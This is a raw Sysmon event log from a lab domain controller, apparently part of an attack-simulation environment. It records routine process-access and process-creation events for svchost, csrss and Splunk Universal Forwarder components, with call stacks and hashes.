13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-866A-5FCF-6301-000000009101}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-866A-5FCF-6301-000000009101}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.220{10ACEC4A-866A-5FCF-6301-000000009101}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-866B-5FCF-6501-000000009101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-866B-5FCF-6501-000000009101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-866B-5FCF-6501-000000009101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.563{10ACEC4A-866B-5FCF-6501-000000009101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:03.032{10ACEC4A-866A-5FCF-6401-000000009101}34363256C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.938{10ACEC4A-866C-5FCF-6601-000000009101}33681256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-866C-5FCF-6601-000000009101}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:04.797{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 